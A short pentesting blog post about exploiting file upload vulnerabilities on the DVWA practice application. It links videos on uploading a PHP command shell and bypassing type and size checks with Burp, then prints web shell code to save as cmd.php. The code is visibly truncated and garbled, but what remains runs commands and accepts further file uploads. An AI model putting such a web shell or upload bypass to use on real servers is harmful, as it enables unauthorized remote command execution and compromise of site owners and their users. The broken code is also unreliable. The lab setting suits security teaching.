File upload vulnerability (PHP cmd shell)

  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  

Here is a video showing you how to upload a php based command shell as part of a file upload vulnerability on the vulnerable application called DVWA this can be downloaded from the following address: http://www.dvwa.co.uk/

Here is another video which shows the same method as above but additionally shows you how to bypass file type and size restrictions using a web proxy called Burp

Here is the code for a simple web shell that you can upload. Paste the code below in notepad and save as cmd.php

&1",$out);
foreach($out as $o)
echo $o . "n";
}
else if(isset($_FILES['file']['tmp_name']))
{
$name = basename($_FILES['file']['name']);
if(move_uploaded_file($_FILES['file']['tmp_name'], $_SERVER['TEMP']?$_SERVER['TEMP']:"/tmp" . "/" . basename($_FILES['file']['name']))) 
{
echo "";
}
else
{
echo "";
}
exit();
}
else
{
?>


PHP Shell




The following two tabs change content below.

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]

William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]

One thought on “File upload vulnerability (PHP cmd shell)

  • November 10, 2014 at 1:03 pm
    Permalink

    it would be nice if u started video tutorials of various programming languages in a hacking point of view

    Reply

Leave a Reply